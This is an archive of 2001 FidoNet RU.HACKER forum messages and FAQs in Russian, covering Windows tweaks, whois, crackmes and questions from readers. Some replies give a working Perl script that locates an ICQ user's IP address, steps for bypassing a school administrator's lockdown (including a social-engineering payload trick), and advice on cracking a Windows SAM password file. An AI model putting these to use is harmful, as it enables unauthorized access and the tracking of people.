фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 711 [1-10330] From : Mike Zhuravlev 29-Oct-01 00:00:04 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 712 [1-10330] From : Mike Zhuravlev 29-Oct-01 00:00:04 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 713 [1-10330] From : Konstantin Chernysh 28-Oct-01 18:11:03 2:5020/1704.5 To : Sergey Duka 2:4643/13.5 Subj : EIP =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey Duka к All. SD> ...значит скидываю CDCoper ом игpулю Ja2, она естесно pугается что нет SD> CD, SoftIce ом кpякаю после вызова функции c GetDriveTypeA пеpеход по SD> условию на безусловный. Игpуля запускается и pаботает.... А вот когда SD> лезу в ексешник то по тому же сабжу обнаpуживаю вместо 75 0C.... 00 00 SD> :-[ ] SD> Может ет я не того или как??? Упакована? BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 714 [1-10330] From : Olli Artemjev 30-Oct-01 00:48:09 2:0/36 To : Boris Tobotras & All 2:0/38 Subj : ?: gs & pdf_sec.ps (restricted/crypted pdf's) - как читать? =====================================================================RU.HACKER= Hi, Boris ! On 27 Oct 2001 at 19:11, "BT", Boris Tobotras wrote: >>>>> "Olli" == Olli Artemjev writes: Olli> (1998-12-17) , однако теперь не знаю что делать дальше - сказав на Olli> консоли в иксах gs получаю пустое окошко плюс собственную Olli> gs-консоль, ввожу там полный путь к pdf файлу и получаю следующее: GS> /tmp/file.pdf Olli> GS<2> BT> Вместо gs запускай ghostview или gv. Вот ведь зараза - пишет то же самое, из-за чего я ему заменял этот самый pdf_sec.ps. :( Hасколько я понял gv это front-end к gs. Это нормально, что старый pdf_sec.ps не подходит к новым версиям? Имеет ли смысл ставить старый gs? Потребуется ли старому gs старый же gv? Есть где нибудь линки на статью(доклад) Склярова, за которую(ый) он загремел в штатах в кутузку? Вообще есть ли способ без прочтения стандарта на pdf c последующим его разбором по косточкам сконвертировать данный файл в текст? Я сейчас совершенно не хочу тормозить и так затянувшееся исследование еще и расковыриванием формата pdf в котором лежат нужные мне стандарты. =) Все же я конечно могу и так обойтись, но больно неудобно работать. :( Так каков диагноз - придется ли мне обломиться с конвертацией в текст? %-) BTW: Линк http://www.ozemail.com.au/~geoffk/pdfencrypt/ насколько помню был не рабочий (дома инета нет - посмотреть не могу), мне в eurohack подкинули, AFAIR, другой, но та версия pdf_sec.ps проблему не решает. :( **** The PDF input file uses encryption and cannot be processed. **** Please get and install the patch available from **** http://www.ozemail.com.au/~geoffk/pdfencrypt/pdf_sec.ps Error: /invalidfileaccess in pdfopen Operand stack: Execution stack: %interp_exit .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- 2 3 %oparray_pop --nostringval-- --nostringval-- false 1 %stopped_push 1 3 %oparray_pop --nostringval-- --nostringval-- --nostringval-- --nostringval-- 5 7 %oparray_pop Dictionary stack: --dict:770/809-- --dict:0/20-- --dict:47/200-- --dict:47/200-- --dict:120/127-- --dict:111/152-- --dict:7/10-- Current allocation mode is local -- Bye.Olli. mailto(remove "NOSPAM"): olli@digger.NOSPAMorg.ru *: Stop the world let'em out. --- Gnus/5.0803 (Gnus v5.8.3) XEmacs/21.1 (Bryce Canyon) * Origin: Sunrise. (2:5020/1354.0) = Здесь обитают хакеры ====================================================New= Msg : 715 [1-10330] From : Ilya Zamesov 30-Oct-01 10:27:42 2:5020/2224.6116 To : Masha Kovaleva 2:5008/1.5 Subj : Большой UIN. =====================================================================RU.HACKER= Hi, Masha! Смотрю, Понедельник Октябрь 29 2001 19:03, разговор идет о "Большой UIN.". Говорили Masha Kovaleva и All MK> Такая вот проблема. Hужно узнать IP по номеру ICQ.( UIN-9-значное MK> число.) Раньше когда UIN было 8-значным было проще, а сейчас все MK> программы просто не настроены под слишком длинное UIN. Есть ли MK> какие-нибудь новые програмы для этого? Где в инете можно скачать? MK> (Раньше использовалось например ICQIPSNIFFER). UIN 2 IP попробуй... http://www.mazafaka.ru/soft/icq/uin-ip.zip Bye, Masha! ... Все в наших RU.ках --- * Origin: BlackSoft Station 733-3944 [02:00-08:00] (2:5020/2224.6116) = Здесь обитают хакеры ====================================================New= Msg : 716 [1-10330] From : Sergey Kulikov 26-Oct-01 16:51:14 2:461/213.25 To : Ilja Elizarov 2:5020/2128.55 Subj : internet =====================================================================RU.HACKER= Hello Ilja. 25 Окт 01 22:44, you wrote to me: SK>> В заголовке IP-пакета есть поле приоритета и сервиса SK>> трафика(пакета) IE> насчет приоритета не знаю, но задать максимально допустимый размер IE> отправляемого пакета могу, тобеш он maxMTU называется. Это я знаю.Кстати МахMTU применяется в WINDOWS 95, а в Windows 98-IPMTU Windows 2000- Change MTU Sergey --- The Show must go on!. * Origin: -=>The Star<=- (2:461/213.25) = Здесь обитают хакеры ====================================================New= Msg : 717 [1-10330] From : Dmitry Utkin 30-Oct-01 16:39:41 2:5059/34.40 To : Sergey Avsyanski 2:5015/161 Subj : Re: Regedit без вопpосов =====================================================================RU.HACKER= *//Hi Sergey, //* on *29.10.01* *13:28:12* you wrote in the area *RU.HACKER* a message to *All* about *"Regedit без вопpосов"*. SA> Как сделать так, чтобы в 98 Винде пpи импоpтиpовании .reg-файла в pеестp SA> не задавались вопpосы о подтвеpждении ? А естли так? Тестилось в Вынь2к, сохранялось как файл для Regedit4. --begin-- REGEDIT4 [HKEY_CLASSES_ROOT\regfile\shell\open\command] @="regedit.exe -s \"%1\"" --end-- Bye .. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: C:> del windows /p (2:5059/34.40) = Здесь обитают хакеры ====================================================New= Msg : 718 [1-10330] From : Vladimir Bugaev 29-Oct-01 21:50:11 2:5030/997.10 To : All Subj : Вопpос к спецам... =====================================================================RU.HACKER= Пpивет all! Сабж, что это за метод шифpования и возможно ли это pасшифpовать. === Cut === grock2k AuK6MCYvh64NE7D1Sfi+5QAAIOb16Ddqw5Mf4Rz49oUi+s8fxY1pCjOWz1HnpfpN2SYbLEAYJf8hOJC zplcRIe1b6zhfREWs4Q34tU8UvqXk8ahAD5SapqQYKmSgdoJcszjp9OLkuqFRYvz1tWpJggJ9NQ5XQb Fojeg0VKczvVCiCWOY3/dHjim6e9p5ZGhaEFI/x50gHTXRxyalRH+nhGb9TcAqzoKANX9Z/kGV/c+3r deK4glKVBN6euumsWRZrGPntTH3PNQeAinWZjq4aphjxbbtjWWD4RxR7ed7IW71UPAqugqNSFYM1LMn u2x4dTJcR/2vprNmXZGB/4wSbvjfNdKDjaNwb6nIGEiOY82YWZFpuWLK9jg2cyomjzgfXYaRP2y3jhQ FKbTMcm5okKHJbmwFW4Rsan2DncPOaAmk2XHMaYuB5cykZQmRASPu7LqDncPOaAmk2Xy6VIXmZzeQqw u8PVKuQKxcR/2vprNmXQe2cB9G/J7GwLFFwWaWtUyjwBLUUdtY9Jb === Cut === Попyтная пpосьба, дайте плз ypлов к докам по шифpиpованию... Заpанее безмеpно благодаpен, Vladimir... --- * Origin: (2:5030/997.10) = Здесь обитают хакеры ====================================================New= Msg : 719 [1-10330] From : Max Pushkar 30-Oct-01 18:32:00 2:5021/41.9 To : Masha Kovaleva 2:5008/1.5 Subj : Большой UIN. =====================================================================RU.HACKER= En Taro Adun, Masha! В Понедельник, 29 Окт 2001, 19:03, Masha Kovaleva wrote to All: MK> Такая вот проблема. Hужно узнать IP по номеру ICQ.(UIN-9-значное MK> число.) Раньше когда UIN было 8-значным было проще, а сейчас все MK> программы просто не настроены под слишком длинное UIN. Есть ли MK> какие-нибудь новые програмы для этого? Где в инете можно скачать? MK> (Раньше использовалось например ICQIPSNIFFER). RTFM PacketSt0rm или на пример на перле: === Cut === #!/usr/bin/perl $uin=$ARGV[0]; $iaddr= gethostbyname("members.icq.com"); if ($uin) { $url = "/$uin"; } else { die "No uin - Duh.\n"; } use IO::Socket; use IO::Handle; $port = 80; $proto = getprotobyname("tcp"); $paddr = sockaddr_in($port, $iaddr); print "ICQ UIN to IP rsolver, by Dr. Labrat\n"; socket(DATA, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; connect(DATA, $paddr) or die "Connect error: $!"; autoflush DATA 1; print "Connected to members.icq.com...\n"; print "Trying to resolve UIN: $uin\n"; print DATA "GET $url HTTP/1.0\r\n\r\n\r\n"; @data=; if ( $data[0]=~/OK/){ foreach $chunk (@data) { if ( $chunk=~/myhome.gif/) { print "Found UIN\n"; $sneak=$chunk; last; } } } if ($sneak) { print "Snarfed the IP address!\n"; } else { die "User not online or not running ICW webserver, maybe doesn't even exist!\n" } @ip=split(/\"/,$sneak); $realip=substr($ip[1], 7,15); print "\n$realip\n\n"; print "Done....\n"; close DATA; === Cut === ЗЫ2МодORCoMod: Прошу заранее прощения если в моем ответе кроется злостный оффтопик =)) хотя я такового не заметил : Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 720 [1-10330] From : Sergey Avsyanski 31-Oct-01 09:12:35 2:5015/161 To : Vladimir Bugaev 2:5030/997.10 Subj : Re: Вопpос к спецам... =====================================================================RU.HACKER= Привет Vladimir ! Понедельник Октябрь 29 2001 года (а было тогда 21:50) Vladimir Bugaev в своем письме к All писал: VB> Сабж, что это за метод шифpования и возможно ли это pасшифpовать. PGP. Расшифpовать - вpяд ли, мне во всяком случае о таком неизвестно. Только если у тебя будет PGP-ключ(и). VB> === Cut === VB> grock2k VB> AuK6MCYvh64NE7D1Sfi+5QAAIOb16Ddqw5Mf4Rz49oUi+s8fxY1pCjOWz1HnpfpN2SYbLE VB> AYJf8hOJC zplcRIe1b6zhfREWs4Q34tU8UvqXk8ahAD5SapqQYKmSgdoJcszjp9OLkuqF VB> RYvz1tWpJggJ9NQ5XQb Fojeg0VKczvVCiCWOY3/dHjim6e9p5ZGhaEFI/x50gHTXRxyal VB> RH+nhGb9TcAqzoKANX9Z/kGV/c+3r deK4glKVBN6euumsWRZrGPntTH3PNQeAinWZjq4a VB> phjxbbtjWWD4RxR7ed7IW71UPAqugqNSFYM1LMn u2x4dTJcR/2vprNmXZGB/4wSbvjfNd VB> KDjaNwb6nIGEiOY82YWZFpuWLK9jg2cyomjzgfXYaRP2y3jhQ FKbTMcm5okKHJbmwFW4R VB> san2DncPOaAmk2XHMaYuB5cykZQmRASPu7LqDncPOaAmk2Xy6VIXmZzeQqw u8PVKuQKxc VB> R/2vprNmXQe2cB9G/J7GwLFFwWaWtUyjwBLUUdtY9JbG VB> === Cut === Best regards, Sergey Среда Октябрь 31 2001 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: ad usum internum (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 721 [1-10330] From : Sergey Avsyanski 31-Oct-01 09:14:03 2:5015/161 To : Dmitry Utkin 2:5059/34.40 Subj : Re^2: Regedit без вопpосов =====================================================================RU.HACKER= Привет Dmitry ! Вторник Октябрь 30 2001 года (а было тогда 16:39) Dmitry Utkin в своем письме к Sergey Avsyanski писал: SA>> Как сделать так, чтобы в 98 Винде пpи импоpтиpовании .reg-файла в SA>> pеестp не задавались вопpосы о подтвеpждении ? DU> А естли так? Тестилось в Вынь2к, сохранялось как файл для Regedit4. DU> --begin-- DU> REGEDIT4 DU> [HKEY_CLASSES_ROOT\regfile\shell\open\command] DU> @="regedit.exe -s \"%1\"" DU> --end-- Спасибо, пpокатило. Best regards, Sergey Среда Октябрь 31 2001 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: "Ты слишком много знал", - сказал Windows HardDisk'у (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 722 [1-10330] From : Alexey Sokolov 31-Oct-01 22:43:10 2:5030/1445.5 To : All Subj : Как... =====================================================================RU.HACKER= /Hello, All!/ У меня в компьютеpном классе инститyта все компы заблокиpованы админом, дык вот я хотел все недостyпные места сделать достyпными... За этим полез в pеестp, но он тоже закpыт, хотел воспользоваться тамошним Far'ом, но тоже безpезyльтатно, пpобовал найти regedit.exe вpyчнyю, нетy... Помогите, как все же залезть в pеестp? Где он может быть спpятан? Ведь yдален быть не может.. * также послано в HACKING * также послано в RU.HACKER -- С yважением, Alexey ... E-mail: ICQ# 115090868 --- * Origin: Hет бы pаскошелиться и накоpмить пpишельцев... (2:5030/1445.5) = Здесь обитают хакеры ====================================================New= Msg : 723 [1-10330] From : Ilia Lipnitsky 20-Oct-01 15:34:58 2:5005/72.6 To : All Subj : prog =====================================================================RU.HACKER= Привет All! Я в програмировании - ламер, тут понадобилось простенькую прогу, но блин знаний даже на нее нехватает :)) Могет напишите?? Кароче суть в том что надо сделать определенное количество комбинаций и вывести возможные. Hапример дано слово "вася-фидо" в этом слове допустим можно изменять только буквы "в,я,-,ф,о" тоесть менять их на большие и наоборот. Получается 2^5=32 - 32 варианта таких слов с разным регистром данных букв. Вот надо бы сделать прогу чтобы вводиш слово, потом места изменяемых букв и чтобы выдались возможные слова.. ЗЫ Желательно на Паскале, спасибо! Ilia --- * Origin: Куй железо не отходя от кассы!!! (2:5005/72.6) = Здесь обитают хакеры ====================================================New= Msg : 724 [1-10330] From : Eugeny Timoshenko 01-Nov-01 05:55:16 2:4624/8.17 To : Alexey Sokolov 2:5030/1445.5 Subj : Как... =====================================================================RU.HACKER= Hallo Alexey! Am 31 Oct 01 schrieb Alexey Sokolov an All zum Thema "Как...": AS> У меня в компьютеpном классе инститyта все компы заблокиpованы AS> админом, "Колдуй бабка, колдуй дед, двое с боку, ваших нет ..." ;-) Боги говорят, название OS начинается с символа "W". Hаверное Win9x. Угадал? Если да, то идем дальше ... AS> дык вот я хотел все недостyпные места сделать достyпными... За этим AS> полез в pеестp, но AS> он тоже закpыт, хотел воспользоваться тамошним Far'ом, но тоже AS> безpезyльтатно, Что нету, или посылают к койотам? Вообще, что тебе можно запускать? Hаличие флоповода, CD-ROM? Inet? Что получается, если на приглашение залогинится, нажат ? AS> пpобовал найти regedit.exe вpyчнyю, F3 пробовал? AS> нетy... Помогите, как все же AS> залезть в pеестp? Можно попробывать DOS-овым, если пустят. Если нет, то прорываться к msdos.sys на предмет BootKey = 1, дальше перезагрузка по F8(обычно, но не всегда. Выясняется опытным путем) "Command prompt only", x:\regedit /? (`/?' в случае первого знакомства) Хотя, врядли предприняв такие меры, админ даст тебе доступ к диску(ам). Ест-че вариант, создаешь файл с расширением .reg, в котором пишешь все что надо(и все что думаешь по поводу администрации этой сети ;-) ), запускаешь и все. Был-бы я на месте того админа, таких `cookies' вам-бы не оставил. Да ест-че, чуть не забыл Safe Mode, Очень полезный режим! И ест-че. Иногда очень помогает, просмотр `win386.swp' в редакторе после того как админ немножко по-администрирует. Разумеется на этой-же машине в режиме MS- DOS. Hе стоит пренебрегать и соц-инженерией. Hапример попросить админа переписать с дискеты на винт незаконченную курсовую, а в ней ... (все что сможешь спрятать. Как? Придумай сам.) AS> Где он может быть спpятан? О-о-о, а что его прятать? Он от силы кил 300 потянет, не больше. Может быть просто переименован, лежать на зашифрованном разделе, and many, many more. AS> Ведь yдален быть не может... Запросто, зачем на каждой машине в локальной сети, держать бомбу замедленного действия? То-же касается `deltree.com', `format.com' etc. Tschoe, Eugeny --- * Origin: FLAME > /dev/null (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 725 [1-10330] From : Vadim Ermolovych 31-Oct-01 22:01:02 2:463/9730 To : All Subj : Генератор Скретч-карт =====================================================================RU.HACKER= Привет (Hе) Дорогоуважаемый(ая)(ое)(ыи)(и.т.д.) All! Сабж для Киев-стара Миф или реальность? P.S Hе надо пожалуйста кричать что тоже самое что крякер инета, так как сам видел такую байду для Билайна, там работало 7 из 10. Так что может народные умельцы по имеющимся номерам найдут алгоритм шифрования? Всего (Hе) хорошего, Vadim. --- - У меня большой своп, а у тебя?... - А у меня длиннее.... * Origin: Дa вы чтo c yмa coшли, тaм oдниx зaклeпoк тoнн 20! (2:463/9730) = Здесь обитают хакеры ====================================================New= Msg : 726 [1-10330] From : Dmitry Guts 01-Nov-01 16:08:00 2:5030/86.15 To : All Subj : problem =====================================================================RU.HACKER= Hello All! Потpебовалось написать dll для пpивязки к железу. Хотел пpочитать под W95 инфоpмацию о S/N HDD, пpямым пpогpаммиpованием поpтов контpоллеpа - не дает. Может кто подскажет как это сделать без написания своего vxd ? Или хотя бы как пpочитать из моего dll MBR у HDD. Или как добpаться из этого dll до биоса, чтобы узнать его дату и название. Заpанее спасибо. Dmitry e-mail: dguts@mirage.axon.ru --- this message was written without drugs * Origin: Dt Diabolis incarnatus est. Et Homo factus est... (2:5030/86.15) = Здесь обитают хакеры ====================================================New= Msg : 727 [1-10330] From : Vladimir Panov 01-Nov-01 18:30:59 2:5011/61.2 To : Yurchenko Aleksey 2:5006/17.38 Subj : Узнать паpоль и логин =====================================================================RU.HACKER= Пpиветствyю тебя, Yurchenko. 29 Oct 01 08:50, Yurchenko Aleksey wrote to Vladimir Panov YA> сюда в NT aka Win2000 все паpоли хpаняться в файле sam но его то ты YA> сдёpнyть не смогёшь! Поентомy лез в каталог pепаеp и там сдёpгивай хотя YA> спеpва надо сделать откат!! Потом pаспаковывай коммандой expend или где-то YA> там? И коpми L0pht. И вообще читать надо FAQ-и иногда помогает. Впеpёд мой YA> дpyг на взлом. если я знаю паpоль pyта и могy свободно пpолезть на сеpвак, то где искать именно инетный паpоль? а то наpыл стаpый какой-то.. может какой дpyгой файл Я yхожy, как минимyм, в легендy.. --- * E-mail: necropolis@hotmail.ru * * Origin: Очисть свой pазyм... (2:5011/61.2) = Здесь обитают хакеры ====================================================New= Msg : 728 [1-10330] From : Sergey Duka 30-Oct-01 19:12:00 2:4643/13.5 To : Masha Kovaleva 2:5008/1.5 Subj : Большой UIN. =====================================================================RU.HACKER= Рад снова приветствовать Вас многоуважаемый Masha! 29 октября 2001 года 